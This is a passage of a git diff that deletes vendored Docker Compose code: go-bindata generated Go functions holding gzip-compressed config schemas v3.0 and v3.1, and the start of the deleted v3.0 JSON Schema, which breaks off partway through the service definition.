[]byte("\x1f\x8b\x08\x00\x00\x09\x6e\x88\x00\xff\xec\x5a\x4f\x8f\xdb\xb8\x0e\xbf\xe7\x53\x18\x6e\x6f\xcd\xcc\x14\x78\xc5\x03\x5e\x6f\xef\xb8\xa7\xdd\xf3\x0e\x5c\x43\xb1\x99\x44\x1d\x59\x52\x29\x39\x9d\xb4\xc8\x77\x5f\xc8\xff\x22\x2b\x92\xe5\x24\xee\xb6\x87\x9e\x66\x62\x91\x14\xff\xe9\x47\x8a\xf6\xf7\x55\x92\xa4\x6f\x55\xb1\x87\x8a\xa4\x1f\x93\x74\xaf\xb5\xfc\xf8\xf4\xf4\x59\x09\xfe\xd0\x3e\x7d\x14\xb8\x7b\x2a\x91\x6c\xf5\xc3\xfb\x0f\x4f\xed\xb3\x37\xe9\xda\xf0\xd1\xd2\xb0\x14\x82\x6f\xe9\x2e\x6f\x57\xf2\xc3\x7f\x1e\xdf\x3f\x1a\xf6\x96\x44\x1f\x25\x18\x22\xb1\xf9\x0c\x85\x6e\x9f\x21\x7c\xa9\x29\x82\x61\x7e\x4e\x0f\x80\x8a\x0a\x9e\x66\xeb\x95\x59\x93\x28\x24\xa0\xa6\xa0\xd2\x8f\x89\x51\x2e\x49\x06\x92\xfe\x81\x25\x56\x69\xa4\x7c\x97\x36\x8f\x4f\x8d\x84\x24\x49\x15\xe0\x81\x16\x96\x84\x41\xd5\x37\x4f\x67\xf9\x4f\x03\xd9\xda\x95\x6a\x29\xdb\x3c\x97\x44\x6b\x40\xfe\xd7\xa5\x6e\xcd\xf2\xa7\x67\xf2\xf0\xed\xff\x0f\x7f\xbf\x7f\xf8\xdf\x63\xfe\x90\xbd\x7b\x3b\x5a\x36\xfe\x45\xd8\xb6\xdb\x97\xb0\xa5\x9c\x6a\x2a\xf8\xb0\x7f\x3a\x50\x9e\xba\xff\x4e\xc3\xc6\xa4\x2c\x1b\x62\xc2\x46\x7b\x6f\x09\x53\x30\xb6\x99\x83\xfe\x2a\xf0\x25\x66\xf3\x40\xf6\x93\x6c\xee\xf6\xf7\xd8\x3c\x36\xe7\x20\x58\x5d\x45\x23\xd8\x53\xfd\x24\x63\xda\xed\xef\x8b\xdf\xaa\x37\x7a\x92\xb6\xa5\xb0\xf6\x6e\x14\x1c\x65\xbb\xcf\x55\xbe\x6c\x0b\xfb\x6a\x70\x56\xc0\x4b\x25\x48\x26\x8e\xe6\x59\xc0\x1f\x2d\x41\x05\x5c\xa7\x83\x0b\x92\x24\xdd\xd4\x94\x95\xae\x47\x05\x87\x3f\x8d\x88\x67\xeb\x61\x92\x7c\x77\x0f\xb6\x25\xa7\x59\x1f\xfd\x0a\x07\x7c\x58\x0f\xd8\x32\xac\x17\x82\x6b\x78\xd5\x8d\x51\xd3\x5b\xb7\x2e\x10\xc5\x0b\xe0\x96\x32\x98\xcb\x41\x70\xa7\x26\x5c\xc6\xa8\xd2\xb9\xc0\xbc\xa4\x85\x4e\x4f\x0e\xfb\x85\xbc\x78\x3e\x0d\xac\xd6\xaf\x6c\xe5\x11\x98\x16\x44\xe6\xa4\x2c\x47\x76\x10\x44\x72\x4c\xd7\x49\x4a\x35\x54\xca\x6f\x62\x92\xd6\x9c\x7e\xa9\xe1\x8f\x8e\x44\x63\x0d\xae\xdc\x12\x85\x5c\x5e\xf0\x0e\x45\x2d\x73\x49\xd0\x24\xd8\xb4\xfb\xd3\x42\x54\x15\xe1\x4b\x65\xdd\x35\x76\xcc\xf0\xbc\xe0\x9a\x50\x0e\x98\x73\x52\xc5\x12\xc9\x9c\x3a\xe0\xa5\xca\xdb\xfa\x37\x99\x46\xdb\xbc\xe5\x57\x8e\x80\xa1\x18\x2e\x1a\x8f\x92\x4f\x25\x76\x2b\xc6\xa4\xb6\xd1\x2d\x75\x18\x73\x05\x04\x8b\xfd\x8d\xfc\xa2\x22\x94\xcf\xf1\x1d\x70\x8d\x47\x29\x68\x9b\x2f\xbf\x5c\x22\x00\x3f\xe4\x03\x96\x5c\xed\x06\xe0\x07\x8a\x82\x57\xfd\x69\x98\x03\x30\x03\xc8\x1b\xfe\x57\x29\x14\xb8\x8e\x71\x0c\xb4\x97\x06\x53\x47\x3e\xe9\x39\x9e\x7b\xc3\xd7\x49\xca\xeb\x6a\x03\x68\x5a\xba\x11\xe5\x56\x60\x45\x8c\xb2\xfd\xde\xd6\xf2\xc8\xd3\x9e\xcc\xb3\x1d\x68\xdb\x60\xca\x3a\x61\x39\xa3\xfc\x65\xf9\x14\x87\x57\x8d\x24\xdf\x0b\xa5\xe7\x63\xb8\xc5\xbe\x07\xc2\xf4\xbe\xd8\x43\xf1\x32\xc1\x6e\x53\x8d\xb8\x85\xd2\x73\x92\x9c\x56\x64\x17\x27\x92\x45\x8c\x84\x91\x0d\xb0\x9b\xec\x5c\xd4\xf9\x96\x58\xb1\xdb\x19\xd2\x50\xc6\x5d\x74\x2e\xdd\x72\xac\xe6\x97\x48\x0f\x80\x73\x0b\xb8\x90\xe7\x86\xcb\x5d\x8c\x37\x20\x49\xbc\xfb\x1c\x91\x7e\x7a\x6c\x9b\xcf\x89\x53\xd5\xfc\xc7\x58\x9a\xb9\xed\x42\xe2\xd4\x7d\xdf\x13\xc7\xc2\x79\x0d\xc5\x28\x2a\x15\x29\x4c\xdf\x80\xa0\x02\x71\x3d\x93\x76\xcd\x7e\x5e\x89\x32\x94\xa0\x17\xc4\xae\x6f\x82\x48\x7d\x75\x21\x4c\x6e\xea\x1f\x67\x85\x2e\x7a\x81\x88\x58\x13\x52\x6f\xae\x9a\x67\x75\xe3\x29\xd6\xd0\x11\x46\x89\x82\xf8\x61\x0f\x3a\x72\x24\x8d\xca\xc3\x87\x99\x39\xe1\xe3\xfd\xef\x24\x6f\x80\x35\x28\x73\x7e\x8f\x1c\x11\x75\x56\xa5\x39\x6e\x3e\x45\xb2\xc8\x69\xfb\xc1\x2d\xbc\xa4\x65\x18\x2b\x1a\x84\xb0\x0f\x98\x14\xa8\x2f\x4e\xd7\xbf\x53\xee\xdb\xad\xef\xae\xf6\x12\xe9\x81\x32\xd8\xc1\xf8\xd6\xb2\x11\x82\x01\xe1\x23\xe8\x41\x20\x65\x2e\x38\x3b\xce\xa0\x54\x9a\x60\xf4\x42\xa1\xa0\xa8\x91\xea\x63\x2e\xa4\x5e\xbc\xcf\x50\xfb\x2a\x57\xf4\x1b\x8c\xa3\x79\xc6\xfb\x4e\x50\x36\xe2\x39\xaa\x42\xdf\x56\xaf\x95\x2e\x29\xcf\x85\x04\x1e\xf5\x8e\xd2\x42\xe6\x3b\x24\x05\xe4\x12\x90\x8a\xd2\x67\xe0\xda\x8e\x75\x59\x23\x31\xfb\x5f\x8a\x51\x74\xc7\x09\x8b\x39\x5a\x57\x72\x7b\xe3\xc5\x42\xeb\x78\xb8\x6b\x46\x2b\x1a\x3e\x07\x1e\x80\x9d\x51\x03\x5a\xfc\xf7\xc3\xfe\x04\xe4\x9f\x35\xa5\x5c\xc3\x0e\xd0\x87\x94\x13\x5d\xc7\x74\xd3\x31\xa3\xdb\xd8\x13\x1c\x07\x74\x42\x8f\x86\x41\x89\xad\xf6\x33\xf8\x7a\x11\xaf\x5e\xa3\xe1\x6f\x23\x6f\xdd\x29\x92\x79\xe9\xaf\x82\x73\x57\x8d\x2c\x88\xa8\x27\x2f\xa2\xd6\x2a\xda\x18\x36\x34\x5c\x4d\x35\x35\x03\xa9\x35\xc5\x5c\x14\x2f\x4c\xa3\x64\x0e\x41\x49\xfd\xda\xae\x1c\xcb\xae\x98\x23\x3b\x77\x96\x5e\x80\x6f\xa2\x68\x93\x46\x27\xb0\xd3\xd3\xcd\x8e\x28\x38\x79\xa4\x8a\x6c\x9c\x99\x9b\xef\x70\x9b\x6c\xc4\x43\x1c\x63\x10\x34\x52\x27\x2e\x1d\xda\x8e\xf0\x04\xd4\xaf\x39\x38\xd0\xb4\x02\x51\xfb\x6b\xd6\xca\xce\xef\x8e\x29\xb5\x26\xb3\x91\xa0\x5a\x94\x6e\x4c\x9f\x87\xa0\xf6\xfd\x45\x34\x70\x73\x0e\x09\x82\x64\xb4\x20\x2a\x06\x44\x77\x5c\x50\x6b\x59\x12\x0d\x79\xfb\xa2\xea\x2a\xe8\x9f\xc0\x7c\x49\x90\x30\x06\x8c\xaa\x6a\x0e\x86\xa6\x25\x30\x72\xbc\xa9\x7c\x36\xec\x5b\x42\x59\x8d\x90\x93\x42\x77\xef\xc2\x22\x39\x97\x56\x82\x53\x2d\xbc\x08\x31\x6f\xcb\x8a\xbc\xe6\xfd\xb6\x0d\x89\xf7\xc0\x04\xdb\xba\xb9\x77\x4b\x2b\x13\x94\xa8\xb1\xb8\x70\xf6\xcd\x21\x3a\xd7\xfa\x40\xc6\xf4\x3b\x5e\x98\x8e\xa0\x0c\x92\x0c\x57\xff\x28\x7f\xb4\xb4\x74\x7d\x66\x2e\x05\xa3\xc5\x71\x29\x0b\x0b\xc1\x5b\x27\xcf\x49\x88\x3b\x33\xd0\xa4\x83\x69\x85\x2a\xa9\xa3\x87\xb5\x61\xf8\x4a\x79\x29\xbe\x5e\xb1\xe1\x72\xa9\x24\x19\x29\xc0\xc1\xbb\x7b\x1d\xad\x34\x12\xca\xf5\xd5\xe5\xfc\x5e\xb3\xee\xa8\xe6\x43\x7e\x46\x50\x7f\xa0\x8b\xbf\x49\x0d\x20\x7d\x21\xeb\xe8\x3c\xa8\x82\x4a\xa0\x37\x01\x17\x78\xf3\x1d\x33\xb1\x27\x5b\xa0\xaa\xcd\x1a\x20\x76\x54\xe6\xbe\xb8\xf8\x6d\x23\x3e\x24\xcc\xe2\x80\x44\x25\xa9\x96\x3a\x1d\xb3\x47\xaa\xa9\xb7\x06\x27\xd3\xa3\x88\x24\x3c\x8e\x88\x69\x1d\xd7\xbd\xa3\x50\xf5\x86\xc3\x64\x47\x65\xf9\xd3\xf7\x9e\x77\xfe\x35\xe5\x14\xbe\x94\xdc\x07\x7a\xfd\xdb\x90\x40\x54\x9f\x87\x9e\x79\x3d\xf8\x2a\x9b\x1d\xe2\xe0\xab\x88\xe5\xf4\xbf\xb2\xc1\xbb\x03\x33\xba\x2f\x37\x22\x90\xd1\x51\xfd\x46\x8c\xdf\xf9\x75\x65\x7e\x39\x43\x2a\x2b\xcf\x2e\xef\x8f\x53\x29\x31\x7b\x3a\xdf\x71\x64\x63\x35\x5c\x32\xcf\x07\x74\x63\xb4\x9d\x1a\x4a\xf4\x24\x81\x69\xad\xb3\x69\xe7\xc4\x69\xcb\x17\xcc\xf0\xc7\x77\x13\x35\x65\xea\x2d\xda\x0f\x02\xe3\x05\x06\x3e\xfe\x98\x3a\x8d\x68\xef\xdd\xcb\xaf\xc0\x02\xa0\x66\xf1\x5f\x7c\x13\x66\xec\xe4\xc7\x8b\xf9\xc6\xf7\xf1\xd0\xae\xfd\x9e\x2b\x1b\xf9\xc7\x21\x69\xdf\x49\x5b\x90\x92\xd9\xbd\x79\x28\x8c\xde\x2f\xc5\xdc\x91\x61\xff\xc5\x56\xe6\x87\xab\x95\xfd\xb7\xf9\xba\x6e\x75\x5a\xfd\x13\x00\x00\xff\xff\x46\xf7\x7b\x23\xe5\x2a\x00\x00") - -func dataConfig_schema_v30JsonBytes() ([]byte, error) { - return bindataRead( - _dataConfig_schema_v30Json, - "data/config_schema_v3.0.json", - ) -} - -func dataConfig_schema_v30Json() (*asset, error) { - bytes, err := dataConfig_schema_v30JsonBytes() - if err != nil { - return nil, err - } - - info := bindataFileInfo{name: "data/config_schema_v3.0.json", size: 0, mode: os.FileMode(0), modTime: time.Unix(0, 0)} - a := &asset{bytes: bytes, info: info} - return a, nil -} - -var _dataConfig_schema_v31Json = []byte("\x1f\x8b\x08\x00\x00\x09\x6e\x88\x00\xff\xec\x1a\xcb\x8e\xdb\x36\xf0\xee\xaf\x10\x94\xdc\xe2\xdd\x4d\xd1\xa0\x40\x73\xeb\xb1\xa7\xf6\xdc\x85\x23\xd0\xd2\x58\x66\x96\x22\x19\x92\x72\xd6\x09\xfc\xef\x05\xf5\x32\x45\x91\x22\x6d\x2b\xd9\x45\xd1\xd3\xae\xc5\x99\xe1\xbc\x67\x38\xe4\xf7\x55\x92\xa4\x6f\x65\xbe\x87\x0a\xa5\x1f\x93\x74\xaf\x14\xff\xf8\xf0\xf0\x59\x32\x7a\xd7\x7e\xbd\x67\xa2\x7c\x28\x04\xda\xa9\xbb\xf7\x1f\x1e\xda\x6f\x6f\xd2\xb5\xc6\xc3\x85\x46\xc9\x19\xdd\xe1\x32\x6b\x57\xb2\xc3\xaf\xf7\xbf\xdc\x6b\xf4\x16\x44\x1d\x39\x68\x20\xb6\xfd\x0c\xb9\x6a\xbf\x09\xf8\x52\x63\x01\x1a\xf9\x31\x3d\x80\x90\x98\xd1\x74\xb3\x5e\xe9\x35\x2e\x18\x07\xa1\x30\xc8\xf4\x63\xa2\x99\x4b\x92\x01\xa4\xff\x60\x90\x95\x4a\x60\x5a\xa6\xcd\xe7\x53\x43\x21\x49\x52\x09\xe2\x80\x73\x83\xc2\xc0\xea\x9b\x87\x33\xfd\x87\x01\x6c\x6d\x53\x35\x98\x6d\xbe\x73\xa4\x14\x08\xfa\xf7\x94\xb7\x66\xf9\xd3\x23\xba\xfb\xf6\xc7\xdd\x3f\xef\xef\x7e\xbf\xcf\xee\x36\xef\xde\x8e\x96\xb5\x7e\x05\xec\xda\xed\x0b\xd8\x61\x8a\x15\x66\x74\xd8\x3f\x1d\x20\x4f\xdd\x7f\xa7\x61\x63\x54\x14\x0d\x30\x22\xa3\xbd\x77\x88\x48\x18\xcb\x4c\x41\x7d\x65\xe2\x29\x24\xf3\x00\xf6\x42\x32\x77\xfb\x3b\x64\x1e\x8b\x73\x60\xa4\xae\x82\x16\xec\xa1\x5e\x48\x98\x76\xfb\x65\xec\x27\x21\x17\xa0\xc2\x2e\xdb\x42\xbd\x98\xc7\xea\xed\x6f\x13\x78\xd5\x0b\x3d\x0b\xdb\x42\x18\x7b\x37\x0c\x8e\xc2\xdb\xa5\x2a\x57\x78\xf9\x75\x35\x28\xcb\xa3\xa5\x02\x38\x61\x47\xfd\xcd\xa3\x8f\x16\xa0\x02\xaa\xd2\x41\x05\x49\x92\x6e\x6b\x4c\x0a\x5b\xa3\x8c\xc2\x5f\x9a\xc4\xa3\xf1\x31\x49\xbe\xdb\x99\xcc\xa0\xd3\xac\x8f\x7e\xf9\x0d\x3e\xac\x7b\x64\x19\xd6\x73\x46\x15\x3c\xab\x46\xa8\xf9\xad\x5b\x15\xb0\xfc\x09\xc4\x0e\x13\x88\xc5\x40\xa2\x94\x33\x2a\x23\x58\xaa\x8c\x89\xac\xc0\xb9\x4a\x4f\x16\xfa\x84\x5e\xd8\x9f\x06\x54\xe3\xd7\x66\xe5\x20\x98\xe6\x88\x67\xa8\x28\x46\x72\x20\x21\xd0\x31\x5d\x27\x29\x56\x50\x49\xb7\x88\x49\x5a\x53\xfc\xa5\x86\x3f\x3b\x10\x25\x6a\xb0\xe9\x16\x82\xf1\xe5\x09\x97\x82\xd5\x3c\xe3\x48\x68\x07\x9b\x57\x7f\x9a\xb3\xaa\x42\x74\x29\xaf\xbb\x44\x8e\x08\xcd\x33\xaa\x10\xa6\x20\x32\x8a\xaa\x90\x23\xe9\xa8\x03\x5a\xc8\xac\x2d\xf8\xb3\x6e\xb4\xcb\x5a\x7c\x69\x11\x18\xaa\xff\xa2\xf6\x28\xe8\x9c\x63\xb7\x64\xb4\x6b\x6b\xde\x52\x0b\x31\x93\x80\x44\xbe\xbf\x12\x9f\x55\x08\xd3\x18\xdd\x01\x55\xe2\xc8\x19\x6e\xfd\xe5\xd5\x39\x02\xd0\x43\x36\xe4\x92\x8b\xd5\x00\xf4\x80\x05\xa3\x55\x1f\x0d\x31\x09\x66\x48\xf2\x1a\xff\x99\x33\x09\xb6\x62\x2c\x01\xcd\xa5\x41\xd4\x91\x4e\x7a\x8c\xc7\x5e\xf0\x75\x92\xd2\xba\xda\x82\xd0\x3d\xec\x08\x72\xc7\x44\x85\x34\xb3\xfd\xde\xc6\xf2\x48\xd3\x0e\xcf\x33\x15\x68\xca\xa0\xcb\x3a\x22\x19\xc1\xf4\x69\x79\x17\x87\x67\x25\x50\xb6\x67\x52\xc5\xe7\x70\x03\x7d\x0f\x88\xa8\x7d\xbe\x87\xfc\x69\x06\xdd\x84\x1a\x61\x33\xa9\x62\x9c\x1c\x57\xa8\x0c\x03\xf1\x3c\x04\x42\xd0\x16\xc8\x55\x72\x2e\xaa\x7c\x83\x2c\x2b\x4b\x0d\xea\xf3\xb8\x49\xe7\xd2\x2d\x87\x6a\x7e\x21\xf0\x01\x44\x6c\x01\x67\xfc\xdc\x70\xd9\x8b\xe1\x06\x24\x09\x77\x9f\x23\xd0\x4f\xf7\x6d\xf3\x39\x13\x55\xcd\x7f\x84\xa4\x1b\xbb\x5d\x48\xac\xba\xef\xfa\x62\x49\x18\xd7\x50\x8c\xac\x52\xa1\x5c\xf7\x0d\x02\xa4\xc7\xae\x67\xd0\xee\x74\x93\x55\xac\xf0\x39\xe8\x04\xd8\xd6\x8d\x37\x53\x5f\x5c\x08\x93\xab\xfa\xc7\x28\xd3\x05\x0f\x10\x01\x69\x7c\xec\xc5\xb2\x79\x66\x37\xec\x62\x0d\x1c\x22\x18\x49\x08\x07\xbb\x57\x91\x23\x6a\x98\x1f\x3e\x44\xfa\x84\x0b\xf7\xb7\x59\x5c\x0f\xaa\x97\x66\x7c\x8f\x1c\x20\x75\x66\xa5\x09\x37\x17\x23\x9b\x40\xb4\xfd\xe0\x16\x9e\xe3\xc2\x9f\x2b\x9a\x0c\x61\x06\x18\x67\x42\x4d\xa2\xeb\xe7\x94\xfb\x76\xeb\x9b\xab\x3d\x17\xf8\x80\x09\x94\x30\x3e\xb5\x6c\x19\x23\x80\xe8\x28\xf5\x08\x40\x45\xc6\x28\x39\x46\x40\x4a\x85\x44\xf0\x40\x21\x21\xaf\x05\x56\xc7\x8c\x71\xb5\x78\x9f\x21\xf7\x55\x26\xf1\x37\x18\x5b\xf3\x9c\xef\x3b\x42\x1b\x8b\x21\x6b\x42\x72\xa5\x41\x7d\x29\x29\x1c\xc6\x8e\x44\x18\x4c\x54\xe1\x14\x95\x4a\x56\x8b\x3c\xf6\x80\xad\xf7\x44\xa2\x84\xd8\x23\xbc\x76\xb7\x71\xd8\xcc\x03\x97\x97\x00\x4f\x0a\x5d\x67\xc2\x50\x55\xb6\x7f\x9b\x79\xe5\xe4\x0c\x7d\x79\x94\xb9\xba\xae\x5b\x93\xaa\xc0\x34\x63\x1c\x68\x30\x36\xa4\x62\x3c\x2b\x05\xca\x21\xe3\x20\x30\x73\xaa\x62\x6d\x46\x7a\x51\x0b\xa4\xf7\x9f\x92\x91\xb8\xa4\x88\x84\xc2\x4c\x55\x7c\x77\xe5\xb1\x52\xa9\x70\xb0\xd7\x04\x57\xd8\x1f\x34\x0e\xaf\x8d\xe8\x00\xda\xea\xef\x2e\xfa\x33\x05\xff\xcc\x29\xa6\x0a\x4a\xed\x26\x53\xa7\x9a\xe9\x39\xe7\x5b\xce\x88\x5e\x73\x8f\xc4\xd8\xa0\x33\x7c\x24\x6d\x60\xee\x94\x1b\xc1\xd5\x89\x3a\xf9\x1a\xdd\x75\x34\xf4\xd6\x1d\x23\x1b\x27\xfc\x45\xc5\xdc\x66\x63\xe3\xad\xa7\xee\xa0\xaa\x65\xf0\x58\xd0\xc0\x50\x39\xd7\xd2\x0e\xa0\xc6\xd0\x7e\xd1\x6a\xa1\xdb\x64\x1d\x04\x05\x76\x73\xbb\xb2\x24\xbb\x60\xec\x6e\x9d\x58\x7b\x02\xae\x79\xb2\x09\x1a\x9c\xbf\xcf\xcf\xb6\x3b\x20\xef\xdc\x19\x4b\xb4\xb5\x26\xae\xae\xe0\xd6\xde\x28\x0e\xe1\x1c\x23\x40\x09\x6c\xd9\xa5\x4f\xd4\x66\x3e\x01\xf9\x3a\xc7\x46\x0a\x57\xc0\x6a\x77\xc1\x5b\x99\xfe\xdd\x21\xa5\xc6\x5c\x3e\x60\x54\x03\xd2\xb6\xe9\xe3\x60\xd4\xbe\xbb\x0c\x1a\x2e\x26\x48\x04\x70\x82\x73\x24\x43\x89\xe8\x86\xf1\x44\xcd\x0b\xa4\x20\x6b\xef\x65\x2f\x4a\xfd\x33\x39\x9f\x23\x81\x08\x01\x82\x65\x15\x93\x43\xd3\x02\x08\x3a\x5e\x55\x3e\x1b\xf4\x1d\xc2\xa4\x16\x90\xa1\x5c\x75\x57\xbf\x01\x9f\x4b\x2b\x46\xb1\x62\xce\x0c\x11\xb7\x65\x85\x9e\xb3\x7e\xdb\x06\x24\xd4\xd9\x8c\x9b\xfa\xd8\xc9\x82\xe1\x09\x6d\xe3\x77\x59\x75\x9e\x31\xd1\xb9\xd6\x7b\x3c\xa6\xdf\x71\x22\xba\x00\xa9\x33\xc9\x30\xf8\x09\xe2\x07\x4b\x4b\x77\xca\xc8\x38\x23\x38\x3f\x2e\x25\x61\xce\x68\xab\xe4\x18\x87\xb8\xd1\x03\xb5\x3b\xe8\x56\xa8\xe2\x2a\x18\xac\x0d\xc2\x57\x4c\x0b\xf6\xf5\x82\x0d\x97\x73\x25\x4e\x50\x0e\x56\xbe\xbb\x55\xd1\x52\x09\x84\xa9\xba\xb8\x9c\xdf\x2a\xd6\x0d\xd5\x7c\xf0\xcf\x40\xd6\x1f\xe0\xc2\xf7\xe8\x9e\x4c\x9f\xf3\x3a\x38\x0d\xac\xa0\x62\xc2\xe9\x80\x0b\x3c\xf4\x08\x89\xd8\x83\x2d\x50\xd5\xa2\xc6\xc7\x1d\x54\xc6\xf8\xf2\xa7\x8d\xf0\x88\x78\x13\x4e\x48\x98\xa3\x6a\xa9\xe8\x88\x1e\xa8\xa7\xce\x1a\x9c\xcc\xcf\x2d\x12\xff\xec\x22\xc4\x75\x98\xf7\x0e\x42\xd6\x5b\xea\x19\x21\x4c\x4f\x19\xae\x5b\xfe\xf8\x63\xca\xc9\x7f\x28\xb9\x2d\xe9\xf5\x77\x61\x1e\xab\x3e\x0e\x3d\xf3\x7a\xd0\xd5\x26\xda\xc4\xde\x8b\xa8\xe5\xf8\x6f\xda\x77\x7b\x44\xe0\xea\xf3\x2f\xec\x04\x6f\x48\x2e\xdd\x8b\xa6\x40\x6e\xe9\xa0\xfe\x4f\x2d\xff\x11\x47\xfc\x79\xfe\xd5\x3d\x20\x0b\xbe\xdc\x6a\xa0\xae\x2e\xce\x11\xcf\x95\x5e\x81\xcd\x5e\xda\x14\xe3\xc1\xa2\x61\x92\xe9\x99\x7f\x4e\x93\xd1\xf7\x69\x1d\xc6\x66\xcc\x86\x0d\xe6\x78\xe3\x3b\xae\x90\x73\x83\xa4\x1e\xc4\x73\xbf\x62\x6d\xda\x29\x71\x5e\xf2\x05\x93\xcd\xfd\xbb\x99\x3e\x60\xee\xde\xfb\x07\x15\xd0\x05\x86\x74\x6e\x9b\x5a\x87\x87\x5e\xbb\xd3\x77\x9b\x9e\xf8\x37\xf0\x27\xaf\x38\xb5\x9c\xf4\x38\x99\x49\x7d\x1f\x0f\x5a\xdb\x17\x98\x9b\x91\x7e\x2c\x90\xf6\x15\x89\x91\xdd\x37\xe6\x79\xca\x67\x46\xe7\xdb\x4e\x7b\xcc\xdb\xbf\xb1\xf4\xdc\x6a\xac\xcc\xbf\xcd\x7b\xd8\xd5\x69\xf5\x6f\x00\x00\x00\xff\xff\xfc\xf3\x11\x6a\x88\x2f\x00\x00") - -func dataConfig_schema_v31JsonBytes() ([]byte, error) { - return bindataRead( - _dataConfig_schema_v31Json, - "data/config_schema_v3.1.json", - ) -} - -func dataConfig_schema_v31Json() (*asset, error) { - bytes, err := dataConfig_schema_v31JsonBytes() - if err != nil { - return nil, err - } - - info := bindataFileInfo{name: "data/config_schema_v3.1.json", size: 0, mode: os.FileMode(0), modTime: time.Unix(0, 0)} - a := &asset{bytes: bytes, info: info} - return a, nil -} - -// Asset loads and returns the asset for the given name. -// It returns an error if the asset could not be found or -// could not be loaded. -func Asset(name string) ([]byte, error) { - cannonicalName := strings.Replace(name, "\\", "/", -1) - if f, ok := _bindata[cannonicalName]; ok { - a, err := f() - if err != nil { - return nil, fmt.Errorf("Asset %s can't read by error: %v", name, err) - } - return a.bytes, nil - } - return nil, fmt.Errorf("Asset %s not found", name) -} - -// MustAsset is like Asset but panics when Asset would return an error. -// It simplifies safe initialization of global variables. -func MustAsset(name string) []byte { - a, err := Asset(name) - if err != nil { - panic("asset: Asset(" + name + "): " + err.Error()) - } - - return a -} - -// AssetInfo loads and returns the asset info for the given name. -// It returns an error if the asset could not be found or -// could not be loaded. -func AssetInfo(name string) (os.FileInfo, error) { - cannonicalName := strings.Replace(name, "\\", "/", -1) - if f, ok := _bindata[cannonicalName]; ok { - a, err := f() - if err != nil { - return nil, fmt.Errorf("AssetInfo %s can't read by error: %v", name, err) - } - return a.info, nil - } - return nil, fmt.Errorf("AssetInfo %s not found", name) -} - -// AssetNames returns the names of the assets. -func AssetNames() []string { - names := make([]string, 0, len(_bindata)) - for name := range _bindata { - names = append(names, name) - } - return names -} - -// _bindata is a table, holding each asset generator, mapped to its name. -var _bindata = map[string]func() (*asset, error){ - "data/config_schema_v3.0.json": dataConfig_schema_v30Json, - "data/config_schema_v3.1.json": dataConfig_schema_v31Json, -} - -// AssetDir returns the file names below a certain -// directory embedded in the file by go-bindata. -// For example if you run go-bindata on data/... and data contains the -// following hierarchy: -// data/ -// foo.txt -// img/ -// a.png -// b.png -// then AssetDir("data") would return []string{"foo.txt", "img"} -// AssetDir("data/img") would return []string{"a.png", "b.png"} -// AssetDir("foo.txt") and AssetDir("notexist") would return an error -// AssetDir("") will return []string{"data"}. -func AssetDir(name string) ([]string, error) { - node := _bintree - if len(name) != 0 { - cannonicalName := strings.Replace(name, "\\", "/", -1) - pathList := strings.Split(cannonicalName, "/") - for _, p := range pathList { - node = node.Children[p] - if node == nil { - return nil, fmt.Errorf("Asset %s not found", name) - } - } - } - if node.Func != nil { - return nil, fmt.Errorf("Asset %s not found", name) - } - rv := make([]string, 0, len(node.Children)) - for childName := range node.Children { - rv = append(rv, childName) - } - return rv, nil -} - -type bintree struct { - Func func() (*asset, error) - Children map[string]*bintree -} -var _bintree = &bintree{nil, map[string]*bintree{ - "data": &bintree{nil, map[string]*bintree{ - "config_schema_v3.0.json": &bintree{dataConfig_schema_v30Json, map[string]*bintree{}}, - "config_schema_v3.1.json": &bintree{dataConfig_schema_v31Json, map[string]*bintree{}}, - }}, -}} - -// RestoreAsset restores an asset under the given directory -func RestoreAsset(dir, name string) error { - data, err := Asset(name) - if err != nil { - return err - } - info, err := AssetInfo(name) - if err != nil { - return err - } - err = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755)) - if err != nil { - return err - } - err = ioutil.WriteFile(_filePath(dir, name), data, info.Mode()) - if err != nil { - return err - } - err = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime()) - if err != nil { - return err - } - return nil -} - -// RestoreAssets restores an asset under the given directory recursively -func RestoreAssets(dir, name string) error { - children, err := AssetDir(name) - // File - if err != nil { - return RestoreAsset(dir, name) - } - // Dir - for _, child := range children { - err = RestoreAssets(dir, filepath.Join(name, child)) - if err != nil { - return err - } - } - return nil -} - -func _filePath(dir, name string) string { - cannonicalName := strings.Replace(name, "\\", "/", -1) - return filepath.Join(append([]string{dir}, strings.Split(cannonicalName, "/")...)...) -} - diff --git a/vendor/github.com/docker/docker/cli/compose/schema/data/config_schema_v3.0.json b/vendor/github.com/docker/docker/cli/compose/schema/data/config_schema_v3.0.json deleted file mode 100644 index fbcd8bb859..0000000000 --- a/vendor/github.com/docker/docker/cli/compose/schema/data/config_schema_v3.0.json +++ /dev/null @@ -1,383 +0,0 @@ -{ - "$schema": "http://json-schema.org/draft-04/schema#", - "id": "config_schema_v3.0.json", - "type": "object", - "required": ["version"], - - "properties": { - "version": { - "type": "string" - }, - - "services": { - "id": "#/properties/services", - "type": "object", - "patternProperties": { - "^[a-zA-Z0-9._-]+$": { - "$ref": "#/definitions/service" - } - }, - "additionalProperties": false - }, - - "networks": { - "id": "#/properties/networks", - "type": "object", - "patternProperties": { - "^[a-zA-Z0-9._-]+$": { - "$ref": "#/definitions/network" - } - } - }, - - "volumes": { - "id": "#/properties/volumes", - "type": "object", - "patternProperties": { - "^[a-zA-Z0-9._-]+$": { - "$ref": "#/definitions/volume" - } - }, - "additionalProperties": false - } - }, - - "additionalProperties": false, - - "definitions": { - - "service": { - "id": "#/definitions/service", - "type": "object", - - "properties": { - "deploy": {"$ref": "#/definitions/deployment"}, - "build": { - "oneOf": [ - {"type": "string"}, - { - "type": "object", - "properties": { - "context": {"type": "string"}, - "dockerfile": {"type": "string"}, - "args": {"$ref": "#/definitions/list_or_dict"} - }, - "additionalProperties": false - } - ] - }, - "cap_add": {"type": "array", "items": {"type": "string"}, "uniqueItems": true}, - "cap_drop": {"type": "array", "items": {"type": "string"}, "uniqueItems": true}, - "cgroup_parent": {"type": "string"}, - "command": { - "oneOf": [ - {"type": "string"}, - {"type": "array", "items": {"type": "string"}} - ] - }, - "container_name": {"type": "string"}, - "depends_on": {"$ref": "#/definitions/list_of_strings"}, - "devices": {"type": "array", "items": {"type": "string"}, "uniqueItems": true}, - "dns": {"$ref": "#/definitions/string_or_list"}, - "dns_search": {"$ref": "#/definitions/string_or_list"}, - "domainname": {"type": "string"}, - "entrypoint": { - "oneOf": [ - {"type": "string"}, - {"type": "array", "items": {"type": "string"}} - ] - }, - "env_file": {"$ref": "#/definitions/string_or_list"}, - "environment": {"$ref": "#/definitions/list_or_dict"}, - - "expose": { - "type": "array", - "items": { - 